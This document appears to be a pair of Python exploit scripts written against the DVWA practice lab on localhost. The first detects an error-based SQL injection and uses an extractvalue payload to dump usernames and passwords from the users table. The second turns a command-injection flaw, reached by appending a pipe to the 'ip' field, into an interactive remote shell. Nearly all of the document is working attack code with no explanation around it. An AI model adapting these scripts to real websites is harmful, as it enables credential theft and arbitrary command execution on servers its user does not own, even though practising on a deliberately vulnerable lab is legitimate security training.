sql注入报错exp
import requests
import re
cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'}
url = "http://127.0.0.1/vulnerabilities/sqli/?Submit=Submit%23&id=1"
parms = url[url.index("?")+ 1:].split("&")
def checksql():
for parm in parms:
sqlurl = url.replace(parm, parm + "'")
req = requests.get(sqlurl, cookies=cookies)
if 'SQL syntax' in req.text:
print("存在sql注入")
print("[+]SQL注入点是:%s[+]" % parm)
return True
def getStr(res,sql):
payload = url + "'and(extractvalue(1,concat(0x7e,(select {} from users limit 1),0x7e)))%23".format(sql)
req = requests.get(url=payload,cookies=cookies)
html = re.search(res,req.text).group(1)
return html
def exploit():
strlen=getStr("~(\d+)~","length(concat(user,password))")
pwd1 = getStr("~(.*)'","substring(concat(user,password),1,32)")
pwd2 = getStr("~(.*)~","substring(concat(user,password),32,%s)"% strlen)
return "[+]账号 and 密码:"+pwd1+pwd2
if checksql()==True:
print(exploit())
命令执行
import requests
import base64
cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'}
url = "http://127.0.0.1/vulnerabilities/exec/"
while True:
cmdline = base64.b64encode(input('请输入你的命令<<<').encode("utf-8"))
data = {'ip':'127.0.0.1|'+str(base64.b64decode(cmdline),"utf-8"),'Submit':'Submit'}
req = requests.post(url=url,data=data,cookies=cookies)
getdata = req.text[req.text.index('<pre>')+5:req.text.index('</pre>')]
if getdata == '':
print("命令错误")
else:
print(getdata)